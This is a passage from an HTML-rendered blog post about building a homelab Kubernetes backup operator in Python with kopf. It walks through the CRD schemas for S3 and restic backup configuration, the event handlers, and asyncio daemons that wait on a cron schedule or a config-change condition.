</span></span><span style="display:flex;"><span>                          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the env variable to add.&#34;</span>
</span></span><span style="display:flex;"><span>                              <span style="color:#f92672">value</span>:
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The value of the env variable to add.&#34;</span>
</span></span></code></pre></div><p>This resource configures all of the common settings which will be shared by
all of the individual service backups I will describe next.</p>
<p>My backups will be running with <a href="https://restic.net/">restic</a>, backing up into
S3 buckets on my Ceph Rook cluster for each service.
As all service level backups will work like this, and back up to the same
S3 service, it makes sense to centralize the configuration, instead of copying
it into every service backup CRD.
This configuration happens in the <code>s3BackupConfig</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Configuration for S3 access to the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3Host</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 server hosting the backup buckets.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The S3 credentials for the backup S3 user.&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the Secret containing the credentials.&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_ACCESS_KEY_ID&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the property in the secretName secret with the AWS_SECRET_ACCESS_KEY&#34;</span>
</span></span></code></pre></div><p>Pretty important to me is the flexibility when it comes to what the k8s Secrets
have to look like. I&rsquo;ve been annoyed with some of the Helm charts I&rsquo;ve been using
for prescribing exactly what the properties in the Secret need to be named,
so I introduced a config option here to not only define the Secret&rsquo;s name, but
also the name of the property for the access and secret keys for the S3
credentials.
The <code>s3ServiceConfig</code> has the same structure, but will be used for the
credentials for accessing the S3 buckets of services, instead of the S3 backup
buckets.</p>
<p>The <code>resticPasswordSecret</code> is the configuration of the restic password to
unlock the restic encryption keys.</p>
<p>Finally, there&rsquo;s the <code>jobSpec</code>. This will likely still change in the future,
as I have not yet implemented that part. This spec will be used to create the
<a href="https://kubernetes.io/docs/concepts/workloads/controllers/job/">Jobs</a> which
will run the actual backup. One will be created for each of the
HomelabServiceBackup instances I will describe next. I will not go into detail
on this part of the CRD today and instead keep it until I&rsquo;ve actually implemented
the Job creation.</p>
<p>Then there&rsquo;s the HomelabServiceBackup CRD:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apiextensions.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CustomResourceDefinition</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelabservicebackups.mei-home.net</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scope</span>: <span style="color:#ae81ff">Namespaced</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#ae81ff">mei-home.net</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">names</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">plural</span>: <span style="color:#ae81ff">homelabservicebackups</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">singular</span>: <span style="color:#ae81ff">homelabservicebackup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">versions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">v1alpha1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">served</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">schema</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">openAPIV3Schema</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;This object describes the configuration of the backups for a specific service.&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">backupBucketName</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the S3 bucket to which the backup should be made.&#34;</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">array</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The elements, like PVCs and S3 buckets to back up for this service.&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The Type of the element, either s3 or pvc.&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">enum</span>:
</span></span><span style="display:flex;"><span>                          - <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>                          - <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;The name of the element, either the name of an S3 bucket or a PVC&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">status</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Status of this service backup&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">nextBackup</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Date and time of the next backup run&#34;</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">lastBackup</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">object</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Status of latest backup&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">properties</span>:
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">state</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">integer</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;State of the last backup. 1: Failed, 0: Successful&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">timestamp</span>:
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">string</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Date and time the last backup run was executed&#34;</span>
</span></span></code></pre></div><p>This CRD describes the backups to be done for an individual service. It contains
two main parts, the status and the spec. In the spec, I&rsquo;m configuring the
S3 bucket to be used for the backup, and a list of things to back up. Right now,
I&rsquo;ve only got PersistentVolumeClaims and S3 buckets in mind. An instantiation
might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-service-backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backup-tests</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucketName</span>: <span style="color:#e6db74">&#34;non-existant-bucket&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">non-existant-pvc</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">another-non-existant-pvc</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">non-existant-S3-bucket</span>
</span></span></code></pre></div><h2 id="kopf-overview">Kopf overview</h2>
<p>Kopf has a relatively nice approach to listening for changes to resources it is
supposed to be watching. It makes use of Kubernetes&rsquo; watch API. And then it
combines some Kubernetes events to provide a nicer interface than could be
provided when just using plain events.</p>
<p>The main method are event handlers for a small group of events. These handlers
can be defined for each of four different event categories:</p>
<ol>
<li>Creation of a new resource</li>
<li>Resume of the handler for an already existing resource after an operator
restart</li>
<li>Deletion of a resource</li>
<li>Change of a resource</li>
</ol>
<p>In addition, there are daemons, which are long running handlers. Instead of
running to completion for every event, they stay active from the moment a
resource is created to the moment it is deleted. They are automatically started
up after operator restarts as well.</p>
<p>Finally, there is a generic event handler, which does get the full firehose of
Kubernetes events, without the nice provisioning of diffs and the like you get
for kopf&rsquo;s event category handlers.</p>
<p>The handlers are Python functions with a decorator which describes the
event group it should listen on and the CRD it should listen for. Those
handlers can also be combined, so you can have the same Python function
handling both, creation of a new resource and resume after the operator restarts.</p>
<p>Handlers generally come in two flavors, using threads or using coroutines.
I spontaneously decided to go with the coroutine approach, because I had never
before used Python&rsquo;s <a href="https://docs.python.org/3/library/asyncio.html">asyncio</a>
feature, but I was familiar with coroutines in C and C++.</p>
<h2 id="handling-the-homelabbackupconfig-crd">Handling the HomelabBackupConfig CRD</h2>
<p>There isn&rsquo;t too much to do with the generic handling for this CRD. There is
only ever supposed to be one of those, and the only thing which needs to be done
with it is to store it in memory in the operator and make it available to the
handlers of the HomelabServiceBackup CRD, so they can use the configs to launch
their job.</p>
<p>The implementation of the handlers themselves I kept pretty simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> kopf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> hl_backup_operator.homelab_backup_config <span style="color:#66d9ef">as</span> backupconf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.startup</span>()
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_backup_config_cond</span>(memo, <span style="color:#f92672">**</span>_):
</span></span><span style="display:flex;"><span>    memo<span style="color:#f92672">.</span>backup_conf_cond <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>Condition()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.create</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.resume</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.update</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_resume_update_handler</span>(spec, meta, memo, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">await</span> backupconf<span style="color:#f92672">.</span>handle_creation_and_change(meta[<span style="color:#e6db74">&#34;name&#34;</span>],
</span></span><span style="display:flex;"><span>                                                memo<span style="color:#f92672">.</span>backup_conf_cond, spec)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.delete</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">delete_handler</span>(meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    backupconf<span style="color:#f92672">.</span>handle_deletion(meta[<span style="color:#e6db74">&#34;name&#34;</span>])
</span></span></code></pre></div><p>This sets up a combined handler for creation, resumption and updates of the
CRD. It also creates a <a href="https://docs.python.org/3/library/asyncio-sync.html#condition">Condition</a>
which I will later use in the HomelabServiceBackup handlers to notify them
when the config changed.</p>
<p>The <code>homelab_backup_config</code> module looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> datetime
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> logging
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> croniter
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>__CONFIG <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">handle_creation_and_change</span>(name, cond, spec):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">global</span> __CONFIG
</span></span><span style="display:flex;"><span>    __CONFIG <span style="color:#f92672">=</span> spec
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Set backup config from </span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> to: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>        cond<span style="color:#f92672">.</span>notify_all()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">handle_deletion</span>(name):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">global</span> __CONFIG
</span></span><span style="display:flex;"><span>    __CONFIG <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>warning(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Config </span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> deleted. No backups will be scheduled!&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_config</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> __CONFIG
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_next_service_time</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> __CONFIG:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Service schedule time requested, but no config present.&#34;</span>
</span></span><span style="display:flex;"><span>                      )
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#e6db74">&#34;serviceBackup&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> __CONFIG
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;schedule&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> __CONFIG[<span style="color:#e6db74">&#34;serviceBackup&#34;</span>]):
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Config serviceBackup.schedule is missing.&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    now <span style="color:#f92672">=</span> datetime<span style="color:#f92672">.</span>datetime<span style="color:#f92672">.</span>now(datetime<span style="color:#f92672">.</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> croniter<span style="color:#f92672">.</span>croniter(__CONFIG[<span style="color:#e6db74">&#34;serviceBackup&#34;</span>][<span style="color:#e6db74">&#34;schedule&#34;</span>], now
</span></span><span style="display:flex;"><span>    )<span style="color:#f92672">.</span>get_next(datetime<span style="color:#f92672">.</span>datetime)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_service_backup_spec</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> __CONFIG <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;serviceBackup&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> __CONFIG:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Config serviceBackup is missing.&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> __CONFIG[<span style="color:#e6db74">&#34;serviceBackup&#34;</span>]
</span></span></code></pre></div><p>As I said, I kept it <em>really</em> simple.
This implementation stores the spec as received from the handler in a module
level variable <code>__CONFIG</code> and then has a couple functions to make it available
to the rest of the operator.
The only really interesting part is the <code>get_next_service_time</code> function. It
looks at the <code>spec.serviceBackup.schedule</code> value, which is a string in cron
format, for example like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 18 * * *&#34;</span>
</span></span></code></pre></div><p>I decided to keep all times in UTC internally, just to prevent confusing myself.
Instead of writing my own cron parser, I used <a href="https://github.com/kiorky/croniter">croniter</a>.
It doesn&rsquo;t just provide a parser for the cron format, but also provides a helper
to get the time and date of the next scheduled execution, which I make use of
here.</p>
<h2 id="implementing-the-homelabservicebackup-handling">Implementing the HomelabServiceBackup handling</h2>
<p>The HomelabServiceBackup resource describes the backup for an individual
service. In the operator, it will ultimately need to launch a Job to run the
backup of the configured PersistentVolumeClaims and S3 buckets belonging to the
service.</p>
<p>The first thing I implemented was the waiting for the scheduled execution time
of the backup. For this, I initially thought to use kopf&rsquo;s <a href="https://kopf.readthedocs.io/en/stable/timers/">timers</a>,
but quickly realized that those only allow for a fix interval. But I needed an
adaptable wait, depending on the schedule configured on the HomelabBackupConfig.
For that reason, I reached for kopf&rsquo;s <a href="https://kopf.readthedocs.io/en/stable/daemons/">Daemons</a>.
These are long running handlers. One is created for each instance of the watched
resource.</p>
<p>The handler function itself is again simple, as I just call a separate function
in a module:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> kopf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> hl_backup_operator.homelab_service_backup <span style="color:#66d9ef">as</span> servicebackup
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.startup</span>()
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_backup_config_cond</span>(memo, <span style="color:#f92672">**</span>_):
</span></span><span style="display:flex;"><span>    memo<span style="color:#f92672">.</span>backup_conf_cond <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>Condition()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.daemon</span>(<span style="color:#e6db74">&#34;homelabservicebackups&#34;</span>, initial_delay<span style="color:#f92672">=</span><span style="color:#ae81ff">30</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">service_backup_daemon</span>(name, namespace, spec, memo, stopped, <span style="color:#f92672">**</span>_):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">await</span> servicebackup<span style="color:#f92672">.</span>homelab_service_daemon(name, namespace, spec, memo,
</span></span><span style="display:flex;"><span>                                               stopped)
</span></span></code></pre></div><p>The daemon will spend most of its time waiting, as it only needs to do something
in two cases:</p>
<ol>
<li>When the scheduled time for a backup has arrived</li>
<li>When the backup schedule changes</li>
</ol>
<p>Let&rsquo;s look at the second case first. This is the reason for the usage of the
memo. The <a href="https://kopf.readthedocs.io/en/stable/memos/">memo</a> is a generic
container handled by kopf and made available to all handlers. I&rsquo;m creating a
Condition during operator startup. Every daemon will wait on this condition,
and the handler for HomelabBackupConfig updates will notify all waiters on
that condition when the HomelabBackupConfig changes. This is necessary because
the schedule is configured in the HomelabBackupConfig, so daemons might need to
adjust their wait timer.</p>
<p>Here is what that waiting currently looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">WakeupReason</span>(Enum):
</span></span><span style="display:flex;"><span>    TIMER <span style="color:#f92672">=</span> auto()
</span></span><span style="display:flex;"><span>    SCHEDULE_UPDATE <span style="color:#f92672">=</span> auto()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">cond_waiter</span>(cond):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> cond<span style="color:#f92672">.</span>wait()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">wait_for</span>(waittime, update_condition):
</span></span><span style="display:flex;"><span>    cond_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(cond_waiter(update_condition),
</span></span><span style="display:flex;"><span>                                    name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;condwait&#34;</span>)
</span></span><span style="display:flex;"><span>    sleep_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(asyncio<span style="color:#f92672">.</span>sleep(waittime), name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;sleepwait&#34;</span>)
</span></span><span style="display:flex;"><span>    done, pending <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> asyncio<span style="color:#f92672">.</span>wait([cond_task, sleep_task],
</span></span><span style="display:flex;"><span>                                       return_when<span style="color:#f92672">=</span>asyncio<span style="color:#f92672">.</span>FIRST_COMPLETED)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> p <span style="color:#f92672">in</span> pending:
</span></span><span style="display:flex;"><span>        p<span style="color:#f92672">.</span>cancel()
</span></span><span style="display:flex;"><span>    wake_reasons <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> d <span style="color:#f92672">in</span> done:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;condwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>SCHEDULE_UPDATE)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;sleepwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>TIMER)
